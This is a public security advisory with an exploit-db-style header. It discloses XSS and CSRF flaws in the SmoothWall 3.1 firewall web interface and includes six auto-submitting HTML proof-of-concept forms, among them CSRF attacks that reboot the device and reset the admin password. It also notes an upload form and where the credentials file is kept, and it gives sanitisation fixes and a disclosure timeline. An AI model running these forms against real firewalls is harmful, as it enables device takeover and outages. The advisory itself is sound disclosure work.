######################################################################
# Exploit Title: SmoothWall 3.1 Multiple vulnerabilities
# Date: 21/12/2014
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.smoothwall.org - www.smoothwall.org/download/
# Version: 3.1
# Category: CSRF password reset & XSS persistent
# Google dork:
# Tested on: Smoothwall Linux distribution
######################################################################
 
 
Smoothwall firewall/router distribution description :
======================================================================
 
Smoothwall is a Linux distribution designed to be used as an open source firewall. Designed for ease of use, Smoothwall is configured via a web-based GUI, and requires little or no knowledge of Linux to install or use.
Smoothwall is also a private software company based in the UK that develops firewall and web content filtering software, and which also maintains the SmoothWall open source project.
 
In version 3.0 SP3, many XSS persistent and CSRF vulnerabilities are present (test on march 2013). Dave B has already published some XSS PoC in a January 17, 2011, which have not been corrected (exploit-db 16006).
The present advisory adds new persistent XSS vectors and PoC for a similar impact. The SmoothWall 3.1 released on october 2014, is still affected by these attack vectors.

Smoothwall webGui is simply protected by a Basic Auth (htaccess) without session token. So any page is CSRF vulnerable.
The httpd daemon listens on HTTP on port 81 and HTTPS on port 441.
 

Proof of Concept 1 :
======================================================================
 
XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1
 
File /httpd/cgi-bin/pppsetup.cgi line 365 :
	print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>$profilenames[$c]\n";
 
PoC:
 
<html>
	<body>
		<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/pppsetup.cgi' method='post'>
      			<input type='hidden' name='PROFILENAME' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
			<input type='hidden' name='PROFILE' value='1' />
			<input type='hidden' name='COMPORT' value='ttyS0' />
			<input type='hidden' name='DTERATE' value='9600' />
			<input type='hidden' name='TELEPHONE' value='' />
			<input type='hidden' name='DIALMODE' value='T' />
			<input type='hidden' name='MAXRETRIES' value='' />
			<input type='hidden' name='TIMEOUT' value='' />
			<input type='hidden' name='USERNAME' value='' />
			<input type='hidden' name='PASSWORD' value='' />
			<input type='hidden' name='AUTH' value='pap-or-chap' />
			<input type='hidden' name='LOGINSCRIPT' value='' />
			<input type='hidden' name='ACTION' value='Save' />
    		</form>
    		<script>document.forms['x'].submit();</script>
  	</body>
</html>
 
This XSS is persistent into the /cgi-bin/pppsetup.cgi page and /cgi-bin/logs.cgi/log.dat from these kind of lines :
File /httpd/cgi-bin/pppsetup.cgi (many occurences) :
	&log("$tr{'profile deleted'} $pppsettings{'PROFILENAME'}");


Proof of Concept 2 :
======================================================================
 
XSS persistent through POST : affect SmoothWall 3.0SP3
 
File /httpd/cgi-bin/vpn.cgi/vpnconfig.dat line 258 :
    <td colspan='3'><strong>$tr{'commentc'}</strong> $temp[8]</td>
 
PoC:
 
<html>
	<body>
		<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/vpn.cgi/vpnconfig.dat' method='post'>
			<input type='hidden' name='SECRET1' value='x' />
			<input type='hidden' name='SECRET2' value='x' />
      			<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
			<input type='hidden' name='ACTION' value='Add' />
    		</form>
    		<script>document.forms['x'].submit();</script>
  	</body>
</html>
 
Detail :
	$temp[8] isn't properly sanitize before to be used. This is persistent in this page.


Proof of Concept 3 :
======================================================================
 
XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1
 
File /httpd/cgi-bin/ddns.cgi line 273 :
    &displaytable($filename, \%render_settings, $cgiparams{'ORDER'}, $cgiparams{'COLUMN'} );
 
PoC:
 
<html>
	<body>
		<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ddns.cgi' method='post'>
      			<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
			<input type='hidden' name='ACTION' value='Add' />
    		</form>
    		<script>document.forms['x'].submit();</script>
  	</body>
</html>

Detail :
	All POST params are transmitted to the &displaytable() function without any sanitization. The COMMENT var permit a persistent XSS in this page.


Proof of Concept 4 :
======================================================================
 
XSS non-persistent through POST, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.
 
File /httpd/cgi-bin/ipinfo.cgi line 76 and 101 :
    &openbox("$addr ($hostname)");
 
PoC:
 
<html>
	<body>
		<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ipinfo.cgi' method='post'>
      			<input type='hidden' name='IP' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
			<input type='hidden' name='ACTION' value='Run' />
    		</form>
    		<script>document.forms['x'].submit();</script>
  	</body>
</html>

Detail :
	$addr isn't properly sanitize before printed in the page. This is a non-persistent XSS.

Proof of Concept 5 :
======================================================================
 
CSRF for reboot SmoothWall, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.
 
File /httpd/cgi-bin/shutdown.cgi
 
PoC:
 
<html>
	<body>
		<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/shutdown.cgi' method='post'>
			<input type='hidden' name='ACTION' value='Reboot' />
    		</form>
    		<script>document.forms['x'].submit();</script>
  	</body>
</html>


Proof of Concept 6 :
======================================================================
 
CSRF for change SmoothWall password admin & dial account. Affect SmoothWall 3.0SP3 and 3.1.
 
File /httpd/cgi-bin/changepw.cgi

At least 6 characters alnum.

PoC:
 
<html>
	<body>
		<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/changepw.cgi' method='post'>
			<input type='hidden' name='ADMIN_PASSWORD1' value='newpassword' />
			<input type='hidden' name='ADMIN_PASSWORD2' value='newpassword' />
			<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
			<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
			<input type='hidden' name='ACTION_DIAL' value='Save' />
			<input type='hidden' name='ACTION_ADMIN' value='Save' />
    		</form>
    		<script>document.forms['x'].submit();</script>
  	</body>
</html>


How to prevent and protect from these vuln ?
======================================================================

For example, concerning the PoC n°1 in the file /httpd/cgi-bin/pppsetup.cgi :

To protect and prevent SmoothWall from XSS, include CGI module in the header of each vuln page (like pppsetup.cgi) :
	use CGI qw(:standard);

Then, at the line 365, sanitize the $profilenames[$c] var like this :
	print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>" . escapeHTML($profilenames[$c]) . "\n";

And for the log page, sanitize in all file the log function call :
	&log("$tr{'profile deleted'} " . escapeHTML($pppsettings{'PROFILENAME'}));

Finally, to prevent from CSRF attack, add a token mechanism on all page, or simply check the referer of each request before using POST variables (like in the IPCop firewall/router distribution, which is initially a SmoothWall fork).


Additional note :
======================================================================

It's possible to upload arbitrary file with custom content on the system. But the file is renamed to /var/smoothwall/adsl/mgmt.o.
Use the upload form here : http://SMOOTHWALL_IP:81/cgi-bin/alcateladslfw.cgi

The htpasswd file with admin & dial credentials to access webgui is located here :  /var/smoothwall/auth/users

 
Solution:
======================================================================
2014-24-12 :  None official. Users of SmoothWall need to apply patch himself. 
 

Report timeline :
======================================================================
 
2013-26-03 : Team alerted with details & PoC.
2013-04-09 : Second alert sent to the team
2013-04-09 : First team response (06:00pm) who claims to have knowledge of these bugs and is not considered as issues.
2013-04-10 : Second team response (01:18am), with consideration of these vulns but, I quote : "I was told that while this is a "potential" vulnerability it requires several things to happen for this to be an actual vulnerability."
2013-04-12 : My next response, with details on "how to protect SmootWall from these vulns", and many links pointed to CSRF attacks references and considered as critical.
2014-10-11 : SmootWall 3.1 released, still affected by these issues.
2014-12-21 : Public advisory with some tips to patch manually the solution (from Dave B. advisory in january 2011 to SmoothWall 3.1 in october 2014, there was no official patches).
 
 
Additional resources :
======================================================================
 
- www.smoothwall.org
- www.asafety.fr
- www.exploit-db.com/exploits/16006/
- www.securecoding.cert.org/confluence/display/perl/IDS33-PL.+Sanitize+untrusted+data+passed+across+a+trust+boundary
 
 
Credits :
======================================================================
Yann CAM - Security Consultant @ ASafety
 
--
CONTACT: www.asafety.fr